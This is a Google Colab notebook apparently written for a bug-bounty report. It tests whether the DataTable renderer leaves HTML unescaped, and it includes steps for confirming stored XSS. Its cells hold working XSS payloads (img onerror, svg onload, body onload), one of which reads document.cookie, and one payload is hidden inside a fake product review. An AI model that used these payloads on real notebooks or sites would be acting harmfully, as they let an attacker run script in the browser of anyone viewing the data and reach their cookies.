# Google Colab DataTable XSS Vulnerability Test

**Purpose:** Security Research - Testing for XSS in DataTable rendering

**⚠️ WARNING:** This notebook contains XSS payloads for security testing purposes only.

## Instructions

1. Run each cell below
2. Observe if JavaScript alert boxes appear
3. Save this notebook after running
4. Close and reopen to test **Stored XSS**
5. Document all findings

In [ ]:
# Import required libraries
import pandas as pd
from google.colab import data_table

# Enable DataTable formatter
data_table.enable_dataframe_formatter()

print("✓ DataTable formatter enabled")
print("✓ Ready to test XSS payloads")

✓ DataTable formatter enabled
✓ Ready to test XSS payloads


---

## Test 1: Basic Alert XSS

**Expected if vulnerable:** Alert box showing "XSS-CONFIRMED"

In [ ]:
print("[TEST 1] Basic Alert XSS")
print("If vulnerable, you'll see an alert box...\n")

df_test1 = pd.DataFrame({
    'ID': [1, 2, 3],
    'Name': ['Alice', 'Bob', 'Charlie'],
    'Comment': [
        "Normal comment",
        "<img src=x onerror=alert('XSS-CONFIRMED')>",
        "Another normal comment"
    ]
})

df_test1

[TEST 1] Basic Alert XSS
If vulnerable, you'll see an alert box...



,ID,Name,Comment
0,1,Alice,Normal comment
1,2,Bob,<img src=x onerror=alert('XSS-CONFIRMED')>
2,3,Charlie,Another normal comment


---

## Test 2: Cookie Access XSS

**Expected if vulnerable:** Alert showing your browser cookies

In [ ]:
print("[TEST 2] Cookie Access XSS")
print("If vulnerable, you'll see your cookies in an alert...\n")

df_test2 = pd.DataFrame({
    'Payload': ["<img src=x onerror=alert(document.cookie)>"]
})

df_test2

[TEST 2] Cookie Access XSS
If vulnerable, you'll see your cookies in an alert...



,Payload
0,<img src=x onerror=alert(document.cookie)>


---

## Test 3: DOM Information XSS

**Expected if vulnerable:** Alert showing current domain

In [ ]:
print("[TEST 3] DOM Information XSS")
print("If vulnerable, you'll see the domain in an alert...\n")

df_test3 = pd.DataFrame({
    'Domain Check': ["<img src=x onerror=alert('Domain: '+document.domain)>"]
})

df_test3

[TEST 3] DOM Information XSS
If vulnerable, you'll see the domain in an alert...



,Domain Check
0,<img src=x onerror=alert('Domain: '+document.d...


---

## Test 4: SVG Vector XSS

**Expected if vulnerable:** Alert from SVG onload handler

In [ ]:
print("[TEST 4] SVG Vector XSS")
print("Testing alternative XSS vector...\n")

df_test4 = pd.DataFrame({
    'SVG Test': ["<svg/onload=alert('SVG-XSS')>"]
})

df_test4

[TEST 4] SVG Vector XSS
Testing alternative XSS vector...



,SVG Test
0,<svg/onload=alert('SVG-XSS')>


---

## Test 5: Multiple Payloads

**Expected if vulnerable:** Multiple alerts in sequence

In [ ]:
print("[TEST 5] Multiple Concurrent Payloads")
print("Testing multiple XSS vectors simultaneously...\n")

df_test5 = pd.DataFrame({
    'Payload Type': ['IMG', 'SVG', 'BODY'],
    'Vector': [
        "<img src=x onerror=alert('IMG-1')>",
        "<svg/onload=alert('SVG-2')>",
        "<body onload=alert('BODY-3')>"
    ]
})

df_test5

[TEST 5] Multiple Concurrent Payloads
Testing multiple XSS vectors simultaneously...



,Payload Type,Vector
0,IMG,<img src=x onerror=alert('IMG-1')>
1,SVG,<svg/onload=alert('SVG-2')>
2,BODY,<body onload=alert('BODY-3')>


---

## Test 6: Realistic Attack Scenario

**Scenario:** Attacker creates seemingly innocent product review data

**Expected if vulnerable:** Alert when viewing this "harmless" data

In [ ]:
print("[TEST 6] Realistic Attack Scenario")
print("Simulating malicious product reviews...\n")

df_test6 = pd.DataFrame({
    'Product': ['Laptop Pro', 'Wireless Mouse', 'USB Hub'],
    'Price': [1299, 29, 49],
    'Rating': [4.5, 4.2, 4.8],
    'Review': [
        "Great laptop, very fast!",
        "Good mouse. <img src=x onerror=alert('Malicious Review Executed!')>",
        "Works perfectly"
    ]
})

df_test6

[TEST 6] Realistic Attack Scenario
Simulating malicious product reviews...



,Product,Price,Rating,Review
0,Laptop Pro,1299,4.5,"Great laptop, very fast!"
1,Wireless Mouse,29,4.2,Good mouse. <img src=x onerror=alert('Maliciou...
2,USB Hub,49,4.8,Works perfectly


---

## Test 7: Inspect Generated Output

This cell shows the actual JavaScript that gets generated (technical analysis)

In [ ]:
print("[TEST 7] Technical Analysis - Inspecting Generated Output")
print("="*70)

# Create a simple payload
df_inspect = pd.DataFrame({
    'test': ["<img src=x onerror=alert(1)>"]
})

# Generate the DataTable and inspect its JavaScript output
dt = data_table.DataTable(df_inspect)
js_output = dt._repr_javascript_module_()

print("\nGenerated JavaScript Output:")
print("-" * 70)
print(js_output)
print("-" * 70)

# Check if payload is escaped
if "<img src=x onerror=alert(1)>" in js_output:
    print("\n⚠️  VULNERABLE: Payload is UNESCAPED in JavaScript!")
    print("   The HTML tags are present in raw form.")
elif "&lt;img" in js_output or "\\u003c" in js_output:
    print("\n✓ SAFE: Payload appears to be escaped.")
else:
    print("\n? UNKNOWN: Could not find payload in output.")

# Now display it normally to trigger XSS if vulnerable
print("\nDisplaying the table (XSS will trigger if vulnerable):")
display(df_inspect)

[TEST 7] Technical Analysis - Inspecting Generated Output

Generated JavaScript Output:
----------------------------------------------------------------------

      import "https://ssl.gstatic.com/colaboratory/data_table/1bb32fd872c680fd/data_table.js";

      const table = window.createDataTable({
        data: [[{
            'v': 0,
            'f': "0",
        },
"<img src=x onerror=alert(1)>"]],
        columns: [["number", "index"], ["string", "test"]],
        columnOptions: [{"width": "1px", "className": "index_column"}],
        rowsPerPage: 25,
        helpUrl: "https://colab.research.google.com/notebooks/data_table.ipynb",
        suppressOutputScrolling: true,
        minimumWidth: undefined,
      });

      function appendQuickchartButton(parentElement) {
        let quickchartButtonContainerElement = document.createElement('div');
        quickchartButtonContainerElement.innerHTML = `
    <div id="df-9c519a0c-caf7-4f76-a219-b24be6b00e90">
      <button class="colab-df-

,test
0,<img src=x onerror=alert(1)>


In [9]:

  from IPython.display import HTML, Javascript

  # Test 1: Direct HTML injection
  print("Test 1: Direct HTML (should work if no CSP):")
  display(HTML("<img src=x onerror=alert('Direct HTML')>"))

  # Test 2: Direct JavaScript
  print("\nTest 2: Direct JavaScript (should work if no CSP):")
  display(Javascript("alert('Direct JavaScript')"))

Test 1: Direct HTML (should work if no CSP):



Test 2: Direct JavaScript (should work if no CSP):


<IPython.core.display.Javascript object>

---

## STORED XSS TEST - IMPORTANT!

### Critical Test for Bug Bounty Submission

**To test Stored XSS:**

1. ✅ Run ALL cells above
2. ✅ Save this notebook (File → Save or Ctrl+S)
3. ✅ Note if alerts appeared
4. ✅ **Close this notebook completely**
5. ✅ **Reopen the notebook** (from Colab file list)
6. ✅ **DO NOT re-run any cells**
7. ✅ Simply scroll down to view the saved outputs

**Expected Result if Stored XSS exists:**
- Alerts will fire when viewing saved output
- No code execution needed
- This proves the XSS persists in the .ipynb file

**This is critical because:**
- Stored XSS is higher severity than reflected XSS
- It means malicious notebooks can infect victims
- Just opening/viewing a notebook triggers the attack

📹 **Record this test on video for your bug bounty submission!**

---

## Results Summary

After running all tests, document:

### Evidence Checklist

- [ ] Test 1: Basic Alert - Did alert appear? Yes/No
- [ ] Test 2: Cookie Access - Did cookies display? Yes/No
- [ ] Test 3: DOM Info - Did domain display? Yes/No  
- [ ] Test 4: SVG Vector - Did alert appear? Yes/No
- [ ] Test 5: Multiple Payloads - Did multiple alerts appear? Yes/No
- [ ] Test 6: Realistic Scenario - Did alert appear? Yes/No
- [ ] Test 7: Output shows UNESCAPED payload? Yes/No
- [ ] Stored XSS Test: Alerts on reopening? Yes/No

### Screenshots Needed

1. Alert box appearing
2. Browser console (F12) showing JavaScript execution
3. Test 7 output showing unescaped payload
4. Video of Stored XSS test (reopen → automatic alert)

### For Bug Bounty Report

Include:
- This notebook (.ipynb file)
- All screenshots
- Video proof of Stored XSS
- Technical analysis from Test 7

---

**Security Research Information:**
- Vulnerability: Stored XSS in Google Colab DataTable
- Component: colabtools/google/colab/data_table.py
- Root Cause: Missing html_encode=True parameter
- Severity: HIGH
- Report To: https://bughunters.google.com

**Date Created:** 2026-01-01  
**Created By:** Claude Code - Security Analysis